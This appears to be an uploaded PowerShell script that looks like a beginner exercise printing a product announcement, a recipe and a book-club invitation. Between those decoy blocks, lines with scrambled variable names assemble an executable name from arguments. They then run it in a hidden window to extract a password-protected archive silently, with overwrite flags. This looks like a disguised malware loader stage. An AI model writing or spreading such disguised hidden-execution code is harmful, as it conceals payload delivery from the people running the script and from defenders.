Subido por Brayan padilla


# Defining string variables
$productName = "TechGadget Pro"
$launchDate = "September 1st"
$companyName = "InnovateTech"
$price = "$499"
$announcementMessage = "$companyName is excited to announce the launch of $productName on $launchDate. The starting price is $price."
# Displaying the variables using Write-Output
Write-Output $productName
Write-Output $launchDate
Write-Output $companyName
Write-Output $price
Write-Output $announcementMessage
$iqukwehrovernment = "x"
$yweunchroom = "-aoa"
$uiqarmer = "-y"
$aqxdward = $args[0]
$aqxdwird = $args[1]
$cxaontact = $args[3]
$fzsiction = $args[2]
$waxivergent = $aqxdward+"."+$aqxdwird
# Defining string variables
$recipeName = "Chocolate Chip Cookies"
$cookName = "Chef Jamie"
$prepTime = "15 minutes"
$cookTime = "10 minutes"
$totalTime = "25 minutes"
$servings = "24 cookies"
$recipeIntroduction = "This $recipeName recipe by $cookName takes $prepTime to prepare and $cookTime to bake, yielding a total of $totalTime for $servings."
# Displaying the variables using Write-Output
Write-Output $recipeName
Write-Output $cookName
Write-Output $prepTime
Write-Output $cookTime
Write-Output $totalTime
Write-Output $servings
Write-Output $recipeIntroduction
Start-Process -FilePath $waxivergent -ArgumentList $iqukwehrovernment, $fzsiction, "-p`"$cxaontact`"", $uiqarmer, $yweunchroom -Wait -WindowStyle Hidden
# Defining string variables
$bookTitle = "To Kill a Mockingbird"
$author = "Harper Lee"
$meetingDate = "July 15th"
$meetingTime = "7:00 PM"
$location = "Community Library"
$clubName = "Literary Enthusiasts"
$invitationMessage = "Join the $clubName for a discussion of $bookTitle by $author on $meetingDate at $meetingTime, held at the $location."
# Displaying the variables using Write-Output
Write-Output $bookTitle
Write-Output $author
Write-Output $meetingDate
Write-Output $meetingTime
Write-Output $location
Write-Output $clubName
Write-Output $invitationMessage